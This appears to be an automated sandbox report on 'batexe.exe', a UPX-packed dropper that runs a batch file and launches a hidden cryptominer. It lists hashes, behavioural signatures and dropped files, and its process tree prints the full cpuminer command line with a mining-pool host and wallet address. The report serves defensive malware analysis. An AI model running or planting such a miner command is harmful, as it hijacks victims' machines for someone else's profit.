Analysis

  • max time kernel
    295s
  • max time network
    301s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-ja
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
  • submitted
    18-02-2024 10:21

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2696
    • C:\Users\Admin\AppData\Local\Temp\8B19.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\8B19.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8B19.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4120
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9710.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1820
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2700

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\8B19.tmp\b2e.exe

    Filesize

    25.0MB

    MD5

    52d8dab5113382a29d408525d17f5643

    SHA1

    7f2db10b5d4b9e5cd5d41b86c9ffaee6824259bb

    SHA256

    04b823e5ecdb6ca31cd2054990825d8e763a7df0d2f39a683f954c6c0dde2dee

    SHA512

    6eacd0e8df65ab10b36a900b1a693123e2305c6b2c8ead78a9c4c73284c3508af7a6056724fa789b375b58b26ac12fb1fce1b61b172af94d05a860f54b8ecd50

  • C:\Users\Admin\AppData\Local\Temp\8B19.tmp\b2e.exe

    Filesize

    128KB

    MD5

    272c54a9b6cdfa558e23cc257343048a

    SHA1

    7f26d86cf2a3625ce3e70c9cfc9b0cc075b8d5aa

    SHA256

    1d7e7ea2934d091cb7ab81c31e31b4015e05a9f86b213f9d78b0297c88fb3415

    SHA512

    5139de29262ba7091e5ab0529232912aea9ca34fdeb16165021d3ccaba1d351abc59f2130eaa6af8c3c0510db5f649095f7043ea837267dc9eb4ce0169fa18ba

  • C:\Users\Admin\AppData\Local\Temp\8B19.tmp\b2e.exe

    Filesize

    704KB

    MD5

    2bb8bf63c7d7958f71f9307c8635131f

    SHA1

    2362f18b011bd1e60fa078052821edefa33b8e08

    SHA256

    85151a35fd2a7ef587918c4702b2adbe0c3e7eed43bc8564a662ed03a6f3ce79

    SHA512

    59eba9edea2b2af76f261db76b15912b20070d75db7cf498d55a1bc13f11692d016c9a70ed447a784c874f6d11582112312f3d058443606eb4b6de349a4857ec

  • C:\Users\Admin\AppData\Local\Temp\9710.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    960KB

    MD5

    5f088febb9167d9fa27631de416c40d9

    SHA1

    0e7cfc61e5cd1bb82c846c939d71388e2f9d5086

    SHA256

    869740b99a3d66f9e9decc133d9c3c4a2c14c3e7c62c512248da76f002387fce

    SHA512

    65e4cd0d550b852f50e426e53ff47bf1419a5cc1aaf07010b10b96f392148525950fd11dd3b1e8acda0916d288414629cde845cdc959ed7092e565ccb8ffa920

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    1.1MB

    MD5

    3adca8ad197ff52dab48043a8ccef18b

    SHA1

    c95cf5c2cec6561d8d59f9c9b5194b0ff5725f75

    SHA256

    d760a27a07b95508c74fbdf1cb82f8a433620cb71c15fbb16c911f0d8a64aa4e

    SHA512

    d07481f6fe3e503f72134d3df0cc907bf7a39b7b9eff773d2cf9d78aed070d6e54335ac338aa1d12fa5f5cb1a25d204d3b62de0739a125a8a5dc1f5aa7e2b59d

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    836KB

    MD5

    aeab40ed9a8e627ea7cefc1f5cf9bf7a

    SHA1

    5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

    SHA256

    218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

    SHA512

    c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    999KB

    MD5

    afb1813bf9ea6362f558e55eb091977d

    SHA1

    5e5495325f235b207beef59801f4b7bd4ce205b9

    SHA256

    5e2639eb5792d6925411f97f1fca757722d914c9ebbf9dccc304b73445290806

    SHA512

    01ca231e4b14640f8a048fa2915a5364d331d43fd228f538e9b4d8824601259844a43f8d43374ff6b886c014b31bc9317418025b3e5406a871ad35830ab04651

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    832KB

    MD5

    d33f0e6bb5e8d2b9e111a90544790dc8

    SHA1

    df4e81d22638d511e761744e886c33bc12096c48

    SHA256

    40729edf62213c039a1818c9adb9478aa0284bb26dd071bd1ac4de1da2470048

    SHA512

    ce4ebeae054117d4de8b3fe2403d95a6d819483269f851618958e864887e9b2f42fc9c893e1aa207dfa2d94900c8f4214a67796ddeb2a80ce655d69ec290d629

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    832KB

    MD5

    2bfa2b9803bf342837d2cfe9b2b57f64

    SHA1

    e89eec3559c4904ce523943fed97f3fa2534ab39

    SHA256

    38710a4ce8976e3e452fe43563f28f9a8259165fd68ca94f5d64f5f4a299b6ab

    SHA512

    d099f07ca1cb598bdd6f563d917fe3ddcf3f6f37b589f68da987426e416492acf3dbfb2e18387d9afb168308d55c9acfb568c3d31735ab307fc070ff4da93793

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    810KB

    MD5

    38abdb4de645d01fa4bb35b0225f1e85

    SHA1

    962761251b234505367b106a67f05a8fc395bdfa

    SHA256

    2a62f3b315bebbcf43438d38afe6c85a18203e9dc6bd975eeb93dfb6049c1566

    SHA512

    97431e6a7a10b3b841a62922a568571baceef105c1d24ff473bba19e5020f87ac8924c504019dea589fb54467a97faa25eab87699a2b9aec132da58a4d0e51e0

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    768KB

    MD5

    613807ad6d525aded318b643c33bc17e

    SHA1

    2c9a4180140838c69c20bc4047c3d2d777d3bee4

    SHA256

    896775bd33edafb0d219d1ae3e973e71aa29a4937d0252bd3a4cad074c004971

    SHA512

    d688b0f2570944898097dcc6acb56b3a4c901073f0ce22b5ea260b05a37fe2840d84b44e7aa74c7d73078b0e5a45c24994852f5c03f049982b6ddca6ead89539

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    606KB

    MD5

    585efec1bc1d4d916a4402c9875dff75

    SHA1

    d209613666ccac9d0ddab29a3bc59aa00a0968fa

    SHA256

    2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

    SHA512

    b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

  • memory/2696-9-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB

  • memory/2700-44-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/2700-59-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2700-104-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2700-45-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/2700-46-0x0000000070B60000-0x0000000070BF8000-memory.dmp

    Filesize

    608KB

  • memory/2700-47-0x0000000001050000-0x0000000002905000-memory.dmp

    Filesize

    24.7MB

  • memory/2700-48-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2700-53-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2700-99-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2700-43-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2700-64-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2700-69-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2700-74-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2700-79-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2700-84-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2700-89-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2700-94-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4120-58-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/4120-8-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB